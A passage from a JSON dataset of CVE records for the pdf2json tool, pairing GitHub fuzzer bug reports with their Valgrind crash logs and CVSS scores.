NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19471",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/32",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/32",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2019-05-28T23:23:25Z",
        "description": "Aborted on APITAG Hi, Our fuzzer found a bug due to an invalid read on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Command token too long Error NUMBERTAG Missing 'endstream' Error NUMBERTAG Unknown DCT marker APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf1c is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG A9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C6: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG in arena \"client NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf2c is NUMBERTAG bytes after a block of size NUMBERTAG in arena \"client NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG feabb is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG FEABB NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19472",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/33",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/33",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2019-05-28T23:35:23Z",
        "description": "Invalid read on APITAG Hi, Our fuzzer found a bug due to an invalid read on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Command token too long Error NUMBERTAG Command token too long Error NUMBERTAG Missing 'endstream NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG , APITAG , int , int ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b NUMBERTAG e2 is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG C8: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG A1F: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG , APITAG , int , int ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b NUMBERTAG is NUMBERTAG bytes before a block of size NUMBERTAG in arena \"client NUMBERTAG Error NUMBERTAG Bad Huffman code in DCT stream Error NUMBERTAG Bad DCT header Error NUMBERTAG Unknown operator APITAG NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19473",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/34",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/34",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2019-05-29T07:15:38Z",
        "description": "Floating point exception on APITAG Hi, Our fuzzer found a bug due to a floating point exception on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error NUMBERTAG Command token too long Error NUMBERTAG Illegal character '>' Error: PDF file is damaged attempting to reconstruct xref table... Error: End of file inside array Error: End of file inside dictionary Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Missing 'endstream' Error NUMBERTAG Bad DCT data: missing NUMBERTAG after ff Error NUMBERTAG Bad DCT header NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGFPE NUMBERTAG Integer divide by zero at address NUMBERTAG EBDD NUMBERTAG at NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Floating point 